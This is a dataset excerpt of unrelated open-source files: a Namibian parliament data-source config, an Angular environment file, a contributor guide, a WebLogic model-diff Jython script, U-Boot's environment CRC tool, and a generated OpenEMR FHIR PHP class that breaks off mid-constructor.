text
stringlengths
2
100k
meta
dict
{ "sources": [ { "file": "morph/official.csv", "create": { "from": "morph", "scraper": "duncanparkes/namibia", "query": "SELECT data.id, data.name, data.image, data.party, data.party AS party_id, terms.term_number AS term, data.email, data.area, data.details_url AS source from data JOIN terms ON data.term_id = terms.id WHERE chamber = 'National Assembly' ORDER BY data.id, term DESC" }, "source": "http://www.parliament.gov.na", "type": "membership", "sourcetype": "official" }, { "file": "morph/wikidata.csv", "create": { "from": "morph", "scraper": "tmtmtmtm/namibia-national-assembly-wikidata", "query": "SELECT * FROM data ORDER BY id" }, "source": "http://wikidata.org/", "type": "wikidata", "merge": { "incoming_field": "name", "existing_field": "name", "reconciliation_file": "reconciliation/wikidata.csv" } }, { "file": "manual/terms.csv", "type": "term" }, { "file": "morph/genderbalance.csv", "create": { "from": "morph", "scraper": "everypolitician-scrapers/namibia-assembly-gender-balance", "query": "SELECT uuid, gender FROM data ORDER BY uuid" }, "source": "http://gender-balance.org/", "type": "person", "merge": { "incoming_field": "uuid", "existing_field": "uuid" } }, { "file": "wikidata/groups.json", "type": "group", "create": { "from": "group-wikidata", "source": "manual/group_wikidata.csv" } }, { "file": "wikidata/positions.json", "type": "wikidata-positions", "create": { "from": "wikidata-raw", "source": "reconciliation/wikidata.csv" } }, { "file": "wikidata/elections.json", "type": "wikidata-elections", "create": { "from": "election-wikidata", "office": "Q21295994" } } ] }
{ "pile_set_name": "Github" }
// Development build configuration.
// During `ng build --prod` the `fileReplacements` array in `angular.json`
// swaps this file for `environment.prod.ts`.

// Single source of truth for the build mode of this configuration file.
const isProduction = false;

export const environment = {
  production: isProduction,
};

/*
 * For easier debugging in development mode, you can import the following file
 * to ignore zone related error stack frames such as `zone.run`, `zoneDelegate.invokeTask`.
 *
 * This import should be commented out in production mode because it will have a negative impact
 * on performance if an error is thrown.
 */
// import 'zone.js/dist/zone-error';  // Included with Angular CLI.
{ "pile_set_name": "Github" }
# Contributing Contributions are **welcome** and will be fully **credited**. Please read and understand the contribution guide before creating an issue or pull request. ## Etiquette This project is open source, and as such, the maintainers give their free time to build and maintain the source code held within. They make the code freely available in the hope that it will be of use to other developers. It would be extremely unfair for them to suffer abuse or anger for their hard work. Please be considerate towards maintainers when raising issues or presenting pull requests. Let's show the world that developers are civilized and selfless people. It's the duty of the maintainer to ensure that all submissions to the project are of sufficient quality to benefit the project. Many developers have different skillsets, strengths, and weaknesses. Respect the maintainer's decision, and do not be upset or abusive if your submission is not used. ## Viability When requesting or submitting new features, first consider whether it might be useful to others. Open source projects are used by many developers, who may have entirely different needs to your own. Think about whether or not your feature is likely to be used by other users of the project. ## Procedure Before filing an issue: - Attempt to replicate the problem, to ensure that it wasn't a coincidental incident. - Check to make sure your feature suggestion isn't already present within the project. - Check the pull requests tab to ensure that the bug doesn't have a fix in progress. - Check the pull requests tab to ensure that the feature isn't already in progress. Before submitting a pull request: - Check the codebase to ensure that your feature doesn't already exist. - Check the pull requests to ensure that another person hasn't already submitted the feature or fix. ## Requirements If the project maintainer has any additional requirements, you will find them listed here. 
- **[PSR-2 Coding Standard](https://github.com/php-fig/fig-standards/blob/master/accepted/PSR-2-coding-style-guide.md)** - The easiest way to apply the conventions is to install [PHP Code Sniffer](http://pear.php.net/package/PHP_CodeSniffer). - **Add tests!** - Your patch won't be accepted if it doesn't have tests. - **Document any change in behaviour** - Make sure the `README.md` and any other relevant documentation are kept up-to-date. - **Consider our release cycle** - We try to follow [SemVer v2.0.0](http://semver.org/). Randomly breaking public APIs is not an option. - **One pull request per feature** - If you want to do more than one thing, send multiple pull requests. - **Send coherent history** - Make sure each individual commit in your pull request is meaningful. If you had to make multiple intermediate commits while developing, please [squash them](http://www.git-scm.com/book/en/v2/Git-Tools-Rewriting-History#Changing-Multiple-Commit-Messages) before submitting. **Happy coding**!
{ "pile_set_name": "Github" }
# Copyright (c) 2019, 2020, Oracle Corporation and/or its affiliates.
# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl.
#
# ------------
# Description:
# ------------
#
# This code compares python dictionaries. It is used to compare the new vs the old version.
# output is written as csv file /tmp/model_diff_rc containing the return codes that represent the differences.
# also the actual difference in model as yaml and json /tmp/diffed_model.json /tmp/diffed_model.yaml
#
# This script is invoked by jython. See modelInImage.sh diff_model
#
import re
import sets
import sys, os, traceback
from java.lang import System

# Return codes written to /tmp/model_diff_rc (comma-separated) describing
# the kind of difference found between the two models.
UNSAFE_ONLINE_UPDATE=0
SAFE_ONLINE_UPDATE=1
FATAL_MODEL_CHANGES=2
MODELS_SAME=3
SECURITY_INFO_UPDATED=4
RCU_PASSWORD_CHANGED=5

# The following class is borrowed directly from the WDT project's yaml_translator.py
class PythonToYaml:
    """
    A class that converts a Python dictionary into Yaml and writes the output to a file.
    """
    # 4 spaces
    _indent_unit = '    '
    # Characters that force a YAML scalar to be quoted.
    _requires_quotes_chars_regex = '[:{}\[\],&*#?|<>=!%@`-]'

    def __init__(self):
        return

    def _write_dictionary_to_yaml_file(self, dictionary, writer, indent=''):
        """
        Do the actual heavy lifting of converting a dictionary and writing it to the file. This method is
        called recursively when a value of the dictionary entry is itself a dictionary.
        :param dictionary: the Python dictionary to convert
        :param writer: the java.io.PrintWriter for the output file
        :param indent: the amount of indent to use (based on the level of recursion)
        :raises: IOException: if an error occurs while writing the output
        """
        if dictionary is None:
            return
        for key, value in dictionary.iteritems():
            quoted_key = self._quotify_string(key)
            if isinstance(value, dict):
                writer.write(indent + quoted_key + ':' + '\n')
                self._write_dictionary_to_yaml_file(value, writer, indent + self._indent_unit)
            else:
                writer.write(indent + quoted_key + ': ' + self._get_value_string(value) + '\n')
        return

    def _get_value_string(self, value):
        """
        Convert the Python value into the proper Yaml value
        :param value: the Python value
        :return: the Yaml value
        """
        if value is None:
            result = 'null'
        elif type(value) is int or type(value) is long or type(value) is float:
            result = str(value)
        elif type(value) is list:
            # Render as a YAML flow sequence: [ a, b, c ]
            new_value = '['
            for element in value:
                new_value += ' ' + self._get_value_string(element) + ','
            if len(new_value) > 1:
                new_value = new_value[:-1]  # drop the trailing comma
            new_value += ' ]'
            result = str(new_value)
        else:
            result = self._quotify_string(str(value))
        return result

    def _quotify_string(self, text):
        """
        Insert quotes around the string value if it contains Yaml special characters that require it.
        :param text: the input string
        :return: the quoted string, or the original string if no quoting was required
        """
        if bool(re.search(self._requires_quotes_chars_regex, text)):
            result = '\'' + self._quote_embedded_quotes(text) + '\''
        else:
            result = self._quote_embedded_quotes(text)
        return result

    def _quote_embedded_quotes(self, text):
        """
        Replace any embedded quotes with two quotes.
        :param text: the text to quote
        :return: the quoted text
        """
        result = text
        if '\'' in text:
            result = result.replace('\'', '\'\'')
        if '"' in text:
            result = result.replace('"', '""')
        return result


class ModelDiffer:
    # Computes the difference between two model dictionaries (current vs past).
    # Results accumulate in the module-level lists all_changes/all_added/all_removed.

    def __init__(self, current_dict, past_dict):
        self.final_changed_model=dict()
        self.current_dict = current_dict
        self.past_dict = past_dict
        self.set_current = sets.Set()
        self.set_past = sets.Set()
        for item in self.current_dict.keys():
            self.set_current.add(item)
        for item in self.past_dict.keys():
            self.set_past.add(item)
        self.intersect = self.set_current.intersection(self.set_past)

    def added(self):
        # Keys present only in the current model.
        return self.set_current - self.intersect

    def removed(self):
        # Keys present only in the past model.
        return self.set_past - self.intersect

    def changed(self):
        # Keys present in both models whose values differ.
        result = sets.Set()
        for o in self.intersect:
            if self.past_dict[o] != self.current_dict[o]:
                result.add(o)
        return result

    def unchanged(self):
        # Keys present in both models whose values are equal.
        result = sets.Set()
        for o in self.intersect:
            if self.past_dict[o] == self.current_dict[o]:
                result.add(o)
        return result

    def print_diff(self, s, category):
        print category
        if len(s) > 0:
            print s

    def recursive_changed_detail(self, key, token, root):
        # Walks down a changed key, recording leaf-level change paths as
        # '|'-separated tokens in the global all_changes/all_added/all_removed lists.
        debug("DEBUG: Entering recursive_changed_detail key=%s token=%s root=%s", key, token, root)
        a=ModelDiffer(self.current_dict[key], self.past_dict[key])
        diff=a.changed()
        added=a.added()
        removed=a.removed()
        saved_token=token
        debug('DEBUG: In recursive changed detail %s', diff)
        debug('DEBUG: In recursive added detail %s', added)
        if len(diff) > 0:
            for o in diff:
                token=saved_token
                # The token is a | separated string that is used to parse and rebuild the structure later
                debug('DEBUG: in recursive changed detail walking down 1 %s', o)
                token=token+'|'+o
                if a.is_dict(o):
                    debug('DEBUG: in recursive changed detail walking down 2 %s', token)
                    a.recursive_changed_detail(o, token, root)
                    last=token.rfind('|')
                    token=root
                else:
                    all_changes.append(token)
                    last=token.rfind('|')
                    token=root
        # already out of recursive calls, add all entries from current dictionary
        # resources.JDBCSubsystemResources.*  (note it may not have the lower level nodes
        added_token=token
        debug('DEBUG: current added token %s' , added_token)
        if len(added) > 0:
            for item in added:
                token=saved_token
                debug('DEBUG: recursive added token %s item %s ', token, item)
                all_added.append(token + '|' + item)
        # We don't really care about this, just put something here is enough
        if len(removed) > 0:
            for item in removed:
                debug('DEBUG: removed %s', item)
                all_removed.append(token + '|' + item)
        debug('DEBUG: Exiting recursive_changed_detail')

    def is_dict(self, key):
        # Returns 1 if the current-model value under key is a dict, else 0.
        if isinstance(self.current_dict[key], dict):
            return 1
        else:
            return 0

    def calculate_changed_model(self):
        """
        Calculate the changed model.
        """
        result = dict()
        changed=self.changed()
        for s in changed:
            token=s
            self.recursive_changed_detail(s, token, s)
            self._add_results(all_changes)
            self._add_results(all_added)
            # TODO:  delete needs more work, not simply added to the results
            #self._add_results(all_removed)

    def _add_results(self, ar_changes):
        # The ar_changes is the keys of changes in the dotted format
        #  'resources|JDBCSystemResource|Generic2|JdbcResource|JDBCConnectionPoolParams|TestConnectionsOnReserve
        #
        # Now change it to python dictionary
        for item in ar_changes:
            debug('DEBUG: add_results %s', item)
            splitted=item.split('|',1)
            n=len(splitted)
            result=dict()
            walked=[]
            # Rebuild the nested dict structure one path segment at a time.
            while n > 1:
                tmp=dict()
                tmp[splitted[0]]=dict()
                if len(result) > 0:
                    # traverse to the leaf
                    leaf=result
                    for k in walked:
                        leaf = leaf[k]
                    leaf[splitted[0]]=dict()
                    walked.append(splitted[0])
                else:
                    result=tmp
                    walked.append(splitted[0])
                splitted=splitted[1].split('|',1)
                n=len(splitted)
            #
            # result is the dictionary format
            #
            leaf=result
            value_tree=self.current_dict
            for k in walked:
                leaf = leaf[k]
                value_tree=value_tree[k]
            # walk the current dictionary and set the value
            # doesn't work in delete case
            #
            leaf[splitted[0]] = value_tree[splitted[0]]
            self.merge_dictionaries(self.final_changed_model, result)

    def merge_dictionaries(self, dictionary, new_dictionary):
        """
        Merge the values from the new dictionary to the existing one.
        :param dictionary: the existing dictionary
        :param new_dictionary: the new dictionary to be merged
        """
        for key in new_dictionary:
            new_value = new_dictionary[key]
            if key not in dictionary:
                dictionary[key] = new_value
            else:
                value = dictionary[key]
                if isinstance(value, dict) and isinstance(new_value, dict):
                    self.merge_dictionaries(value, new_value)
                else:
                    dictionary[key] = new_value

    def is_safe_diff(self, model):
        """
        Is it a safe difference for update.
        :param model: diffed model
        return 0 - always return 0 for V1
        """
        # check for phase 1 any security changes in the domainInfo intersection
        if model.has_key('domainInfo'):
            domain_info = model['domainInfo']
            if domain_info.has_key('AdminUserName') or domain_info.has_key('AdminPassword') \
                    or domain_info.has_key('WLSRoles'):
                changed_items.append(SECURITY_INFO_UPDATED)
            if domain_info.has_key('RCUDbInfo'):
                rcu_db_info = domain_info['RCUDbInfo']
                if rcu_db_info.has_key('rcu_schema_password'):
                    changed_items.append(RCU_PASSWORD_CHANGED)
                if rcu_db_info.has_key('rcu_db_conn_string') \
                        or rcu_db_info.has_key('rcu_prefix'):
                    changed_items.append(SECURITY_INFO_UPDATED)
        return 0

    def _is_safe_addition(self, items):
        """
        check the items in all_added to see if can be used for online update
        return 0 false ;
           1 true ;
           2 for fatal
        """
        # allows add attribute to existing entity
        found_in_past_dictionary = 1
        has_topology=0
        for itm in items:
            if itm.find('topology.') == 0:
                has_topology = 1
            debug('DEBUG: is_safe_addition %s', itm)
            found_in_past_dictionary = self._in_model(self.past_dict, itm)
            debug('DBUEG: found_in_past_dictionary %s', found_in_past_dictionary)
            if not found_in_past_dictionary:
                break
            else:
                # check whether it is in the forbidden list
                if self.in_forbidden_list(itm):
                    print 'Found changes not supported for update: %s. Exiting' % (itm)
                    return FATAL_MODEL_CHANGES
        # if there is a shape change
        # return 2 ?
        if has_topology and not found_in_past_dictionary:
            print 'Found changes not supported for update: %s. Exiting' % (itm)
            return FATAL_MODEL_CHANGES
        if found_in_past_dictionary:
            return SAFE_ONLINE_UPDATE
        # allow new additions for anything ??
        return SAFE_ONLINE_UPDATE

    def _in_model(self, dictionary, keylist):
        """
        check whether the keys is in the dictionary
        :param dictionary  dictionary to check
        :param keylist  dot separated key list
        return 1 if it is in model
          0 if it is not in model
        """
        debug('DBEUG: in model keylist=%s dictionary %s', keylist, dictionary)
        splitted=keylist.split('|')
        n=len(splitted)
        i=0
        root_key = splitted[0]
        # loop through the keys and use it to walk the dictionary
        # if it can walk down 3 levels, safely assume it is in the
        # dictionary, otherwise it is a total new addition
        for i in range(0, n):
            if dictionary.has_key(splitted[i]):
                if isinstance(dictionary[splitted[i]], dict):
                    dictionary = dictionary[splitted[i]]
                    continue
                else:
                    break
        if i > 2:
            return 1
        return 0

    def in_forbidden_list(self, itm):
        # Attributes that cannot be changed by an online update.
        forbidden_list = [ '.ListenPort', '.ListenAddress' ]
        for forbidden in forbidden_list:
            if itm.endswith(forbidden):
                return 1
        return 0

    def get_final_changed_model(self):
        """
        Return the changed model.
        """
        return self.final_changed_model


class ModelFileDiffer:
    # Orchestrates the diff: reads two model files, diffs them, and writes
    # the result to /tmp/diffed_model.json and /tmp/diffed_model.yaml.

    def __init__(self, current_dict, past_dict):
        self.current_dict_file = current_dict
        self.past_dict_file = past_dict

    def eval_file(self, file):
        # Local aliases so eval() can resolve bare 'true'/'false' tokens in the file.
        true = True
        false = False
        fh = open(file, 'r')
        content = fh.read()
        return eval(content)

    def write_dictionary_to_json_file(self, dictionary, writer, indent=''):
        """
        Write the python dictionary in json syntax using the provided writer stream.
        :param dictionary: python dictionary to convert to json syntax
        :param writer: where to write the dictionary into json syntax
        :param indent: current string indention of the json syntax. If not provided, indent is an empty string
        """
        _start_dict = "{\n"
        _end_dict = "}\n"
        if dictionary is None:
            return
        end_line = ''
        writer.write(_start_dict)
        end_indent = indent
        indent += ' '
        for key, value in dictionary.iteritems():
            writer.write(end_line)
            end_line = ",\n"
            writer.write(indent + '"' + self.quote_embedded_quotes(key) + '" : ')
            if isinstance(value, dict):
                self.write_dictionary_to_json_file(value, writer, indent)
            else:
                writer.write(self.format_json_value(value))
        writer.write(str(end_indent + _end_dict))
        return

    def quote_embedded_quotes(self, text):
        """
        Quote all embedded double quotes in a string with a backslash.
        :param text: the text to quote
        :return: the quotes result
        """
        result = text
        if type(text) is str and '"' in text:
            result = text.replace('"', '\\"')
        return result

    def format_json_value(self, value):
        """
        Format the value as a JSON snippet.
        :param value: the value
        :return: the JSON snippet
        """
        import java.lang.StringBuilder as StringBuilder
        builder = StringBuilder()
        debug("DEBUG: value %s TYPE %s", value, type(value))
        if type(value) == bool or (type(value) == str and (value == 'true' or value == 'false')):
            if value:
                v = "true"
            else:
                v = "false"
            builder.append(v)
        elif type(value) == str:
            builder.append('"').append(self.quote_embedded_quotes(value)).append('"')
        elif type(value) == list:
            builder.append("[ ")
            ind = 0
            for list_item in value:
                if ind > 0:
                    builder.append(", ")
                builder.append('"').append(list_item).append('"')
                ind = ind+1
            builder.append(" ]")
        else:
            builder.append(value)
        return builder.toString()

    def compare(self):
        # NOTE(review): reads the file names from sys.argv directly, not from
        # the paths passed to __init__ — confirm this is intentional.
        current_dict = self.eval_file(sys.argv[1])
        past_dict = self.eval_file(sys.argv[2])
        obj = ModelDiffer(current_dict, past_dict)
        obj.calculate_changed_model()
        net_diff = obj.get_final_changed_model()
        fh = open('/tmp/diffed_model.json', 'w')
        self.write_dictionary_to_json_file(net_diff, fh)
        #print all_added
        fh.close()
        fh = open('/tmp/diffed_model.yaml', 'w')
        pty = PythonToYaml()
        pty._write_dictionary_to_yaml_file(net_diff, fh)
        fh.close()
        return obj.is_safe_diff(net_diff)


def debug(format_string, *arguments):
    # Prints only when the DEBUG_INTROSPECT_JOB environment variable is set.
    if os.environ.has_key('DEBUG_INTROSPECT_JOB'):
        print format_string % (arguments)
    return


def main():
    try:
        obj = ModelFileDiffer(sys.argv[1], sys.argv[2])
        rc=obj.compare()
        # Write the accumulated return codes as a comma-separated list.
        rcfh = open('/tmp/model_diff_rc', 'w')
        rcfh.write(",".join(map(str,changed_items)))
        rcfh.close()
        System.exit(0)
    except:
        exc_type, exc_obj, exc_tb = sys.exc_info()
        eeString = traceback.format_exception(exc_type, exc_obj, exc_tb)
        print eeString
        System.exit(-1)

if __name__ == "__main__":
    # Module-level accumulators shared by ModelDiffer methods.
    all_changes = []
    all_added = []
    all_removed = []
    changed_items = []
    main()
{ "pile_set_name": "Github" }
/*
 * (C) Copyright 2001
 * Paolo Scaffardi, AIRVENT SAM s.p.a - RIMINI(ITALY), [email protected]
 *
 * SPDX-License-Identifier:	GPL-2.0+
 */

/*
 * envcrc: host-side tool that computes the CRC32 of the embedded U-Boot
 * environment image (the 'environment' symbol linked into this program).
 */

#include <errno.h>
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#ifndef __ASSEMBLY__
#define	__ASSEMBLY__			/* Dirty trick to get only #defines	*/
#endif
#define	__ASM_STUB_PROCESSOR_H__	/* don't include asm/processor.		*/
#include <config.h>
#undef	__ASSEMBLY__

/* Derive the environment address/offset/size from the board config. */
#if defined(CONFIG_ENV_IS_IN_FLASH)
# ifndef  CONFIG_ENV_ADDR
#  define CONFIG_ENV_ADDR	(CONFIG_SYS_FLASH_BASE + CONFIG_ENV_OFFSET)
# endif
# ifndef  CONFIG_ENV_OFFSET
#  define CONFIG_ENV_OFFSET (CONFIG_ENV_ADDR - CONFIG_SYS_FLASH_BASE)
# endif
# if !defined(CONFIG_ENV_ADDR_REDUND) && defined(CONFIG_ENV_OFFSET_REDUND)
#  define CONFIG_ENV_ADDR_REDUND	(CONFIG_SYS_FLASH_BASE + CONFIG_ENV_OFFSET_REDUND)
# endif
# ifndef  CONFIG_ENV_SIZE
#  define CONFIG_ENV_SIZE	CONFIG_ENV_SECT_SIZE
# endif
# if defined(CONFIG_ENV_ADDR_REDUND) && !defined(CONFIG_ENV_SIZE_REDUND)
#  define CONFIG_ENV_SIZE_REDUND	CONFIG_ENV_SIZE
# endif
# if (CONFIG_ENV_ADDR >= CONFIG_SYS_MONITOR_BASE) && \
     ((CONFIG_ENV_ADDR + CONFIG_ENV_SIZE) <= (CONFIG_SYS_MONITOR_BASE + CONFIG_SYS_MONITOR_LEN))
#  define ENV_IS_EMBEDDED
# endif
# if defined(CONFIG_ENV_ADDR_REDUND) || defined(CONFIG_ENV_OFFSET_REDUND)
#  define CONFIG_SYS_REDUNDAND_ENVIRONMENT
# endif
#endif	/* CONFIG_ENV_IS_IN_FLASH */

#if defined(ENV_IS_EMBEDDED) && !defined(CONFIG_BUILD_ENVCRC)
# define CONFIG_BUILD_ENVCRC
#endif

/* Header = CRC word, plus one flag byte when redundant env is configured. */
#ifdef CONFIG_SYS_REDUNDAND_ENVIRONMENT
# define ENV_HEADER_SIZE	(sizeof(uint32_t) + 1)
#else
# define ENV_HEADER_SIZE	(sizeof(uint32_t))
#endif

#define ENV_SIZE (CONFIG_ENV_SIZE - ENV_HEADER_SIZE)

#ifdef CONFIG_BUILD_ENVCRC
# include <environment.h>
extern unsigned int env_size;
extern env_t environment;
#endif	/* CONFIG_BUILD_ENVCRC */

extern uint32_t crc32 (uint32_t, const unsigned char *, unsigned int);

int main (int argc, char **argv)
{
#ifdef CONFIG_BUILD_ENVCRC
	unsigned char pad = 0x00;
	uint32_t crc;
	unsigned char *envptr = (unsigned char *)&environment,
		*dataptr = envptr + ENV_HEADER_SIZE;
	unsigned int datasize = ENV_SIZE;
	unsigned int eoe;

	/* --binary[=pad] selects binary output with an optional pad byte. */
	if (argv[1] && !strncmp(argv[1], "--binary", 8)) {
		int ipad = 0xff;
		if (argv[1][8] == '=')
			sscanf(argv[1] + 9, "%i", &ipad);
		pad = ipad;
	}

	if (pad) {
		/* find the end of env */
		for (eoe = 0; eoe < datasize - 1; ++eoe)
			if (!dataptr[eoe] && !dataptr[eoe+1]) {
				/* two consecutive NULs terminate the env */
				eoe += 2;
				break;
			}
		if (eoe < datasize - 1)
			memset(dataptr + eoe, pad, datasize - eoe);
	}

	crc = crc32 (0, dataptr, datasize);

	/* Check if verbose mode is activated passing a parameter to the program */
	if (argc > 1) {
		if (!strncmp(argv[1], "--binary", 8)) {
			/* Emit the CRC word (LE by default, BE if argv[2] != "le")
			 * followed by the raw environment data. */
			int le = (argc > 2 ? !strcmp(argv[2], "le") : 1);
			size_t i, start, end, step;
			if (le) {
				start = 0;
				end = ENV_HEADER_SIZE;
				step = 1;
			} else {
				start = ENV_HEADER_SIZE - 1;
				end = -1;
				step = -1;
			}
			for (i = start; i != end; i += step)
				printf("%c", (crc & (0xFF << (i * 8))) >> (i * 8));
			if (fwrite(dataptr, 1, datasize, stdout) != datasize)
				fprintf(stderr, "fwrite() failed: %s\n",
					strerror(errno));
		} else {
			printf("CRC32 from offset %08X to %08X of environment = %08X\n",
				(unsigned int) (dataptr - envptr),
				(unsigned int) (dataptr - envptr) + datasize,
				crc);
		}
	} else {
		printf ("0x%08X\n", crc);
	}
#else
	printf ("0\n");
#endif
	return EXIT_SUCCESS;
}
{ "pile_set_name": "Github" }
<?php

namespace OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide;

/*!
 * This class was generated with the PHPFHIR library (https://github.com/dcarbone/php-fhir) using
 * class definitions from HL7 FHIR (https://www.hl7.org/fhir/)
 *
 * Class creation date: June 14th, 2019
 *
 * PHPFHIR Copyright:
 *
 * Copyright 2016-2017 Daniel Carbone ([email protected])
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *        http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 *
 *
 * FHIR Copyright Notice:
 *
 * Copyright (c) 2011+, HL7, Inc.
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without modification,
 * are permitted provided that the following conditions are met:
 *
 *  * Redistributions of source code must retain the above copyright notice, this
 *    list of conditions and the following disclaimer.
 *  * Redistributions in binary form must reproduce the above copyright notice,
 *    this list of conditions and the following disclaimer in the documentation
 *    and/or other materials provided with the distribution.
 *  * Neither the name of HL7 nor the names of its contributors may be used to
 *    endorse or promote products derived from this software without specific
 *    prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
 * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
 * IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
 * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
 * PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
 * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
 * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
 * POSSIBILITY OF SUCH DAMAGE.
 *
 *
 * Generated on Thu, Dec 27, 2018 22:37+1100 for FHIR v4.0.0
 *
 * Note: the schemas & schematrons do not contain all of the rules about what makes resources
 * valid. Implementers will still need to be familiar with the content of the specification and with
 * any profiles that apply to the resources in order to make a conformant implementation.
 *
 */

use OpenEMR\FHIR\R4\FHIRElement\FHIRBackboneElement;

/**
 * A set of rules of how a particular interoperability or standards problem is solved - typically through the use of FHIR resources. This resource is used to gather all the parts of an implementation guide into a logical whole and to publish a computable definition of all the parts.
 *
 * NOTE: generated code — do not hand-edit behavior; regenerate from the FHIR
 * definitions instead.
 */
class FHIRImplementationGuideDefinition extends FHIRBackboneElement implements \JsonSerializable
{
    /**
     * A logical group of resources. Logical groups can be used when building pages.
     * @var \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideGrouping[]
     */
    public $grouping = [];

    /**
     * A resource that is part of the implementation guide. Conformance resources (value set, structure definition, capability statements etc.) are obvious candidates for inclusion, but any kind of resource can be included as an example resource.
     * @var \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideResource[]
     */
    public $resource = [];

    /**
     * A page / section in the implementation guide. The root page is the implementation guide home page.
     * @var \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuidePage
     */
    public $page = null;

    /**
     * Defines how IG is built by tools.
     * @var \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideParameter[]
     */
    public $parameter = [];

    /**
     * A template for building resources.
     * @var \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideTemplate[]
     */
    public $template = [];

    /**
     * @var string
     */
    private $_fhirElementName = 'ImplementationGuide.Definition';

    /**
     * A logical group of resources. Logical groups can be used when building pages.
     * @return \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideGrouping[]
     */
    public function getGrouping()
    {
        return $this->grouping;
    }

    /**
     * A logical group of resources. Logical groups can be used when building pages.
     * @param \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideGrouping $grouping
     * @return $this
     */
    public function addGrouping($grouping)
    {
        $this->grouping[] = $grouping;
        return $this;
    }

    /**
     * A resource that is part of the implementation guide. Conformance resources (value set, structure definition, capability statements etc.) are obvious candidates for inclusion, but any kind of resource can be included as an example resource.
     * @return \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideResource[]
     */
    public function getResource()
    {
        return $this->resource;
    }

    /**
     * A resource that is part of the implementation guide. Conformance resources (value set, structure definition, capability statements etc.) are obvious candidates for inclusion, but any kind of resource can be included as an example resource.
     * @param \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideResource $resource
     * @return $this
     */
    public function addResource($resource)
    {
        $this->resource[] = $resource;
        return $this;
    }

    /**
     * A page / section in the implementation guide. The root page is the implementation guide home page.
     * @return \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuidePage
     */
    public function getPage()
    {
        return $this->page;
    }

    /**
     * A page / section in the implementation guide. The root page is the implementation guide home page.
     * @param \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuidePage $page
     * @return $this
     */
    public function setPage($page)
    {
        $this->page = $page;
        return $this;
    }

    /**
     * Defines how IG is built by tools.
     * @return \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideParameter[]
     */
    public function getParameter()
    {
        return $this->parameter;
    }

    /**
     * Defines how IG is built by tools.
     * @param \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideParameter $parameter
     * @return $this
     */
    public function addParameter($parameter)
    {
        $this->parameter[] = $parameter;
        return $this;
    }

    /**
     * A template for building resources.
     * @return \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideTemplate[]
     */
    public function getTemplate()
    {
        return $this->template;
    }

    /**
     * A template for building resources.
     * @param \OpenEMR\FHIR\R4\FHIRResource\FHIRImplementationGuide\FHIRImplementationGuideTemplate $template
     * @return $this
     */
    public function addTemplate($template)
    {
        $this->template[] = $template;
        return $this;
    }

    /**
     * @return string
     */
    public function get_fhirElementName()
    {
        return $this->_fhirElementName;
    }

    /**
     * Populate the element from an associative array; list-valued fields must
     * be arrays, otherwise an InvalidArgumentException is thrown.
     * @param mixed $data
     */
    public function __construct($data = [])
    {
        if (is_array($data)) {
            if (isset($data['grouping'])) {
                if (is_array($data['grouping'])) {
                    foreach ($data['grouping'] as $d) {
                        $this->addGrouping($d);
                    }
                } else {
                    throw new \InvalidArgumentException('"grouping" must be array of objects or null, ' . gettype($data['grouping']) . ' seen.');
                }
            }
            if (isset($data['resource'])) {
                if (is_array($data['resource'])) {
                    foreach ($data['resource'] as $d) {
                        $this->addResource($d);
                    }
                } else {
                    throw new \InvalidArgumentException('"resource" must be array of objects or null, ' . gettype($data['resource']) . ' seen.');
                }
            }
            if (isset($data['page'])) {
                $this->setPage($data['page']);
            }
            if (isset($data['parameter'])) {
                if (is_array($data['parameter'])) {
                    foreach ($data['parameter'] as $d) {
                        $this->addParameter($d);
                    }
                } else {
                    throw new \InvalidArgumentException('"parameter" must be array of objects or null, ' . gettype($data['parameter']) . ' seen.');
                }
            }
            if (isset($data['template'])) {
                if (is_array($data['template'])) {
                    foreach ($data['template'] as $d) {
                        $this->addTemplate($d);
                    }
                } else {
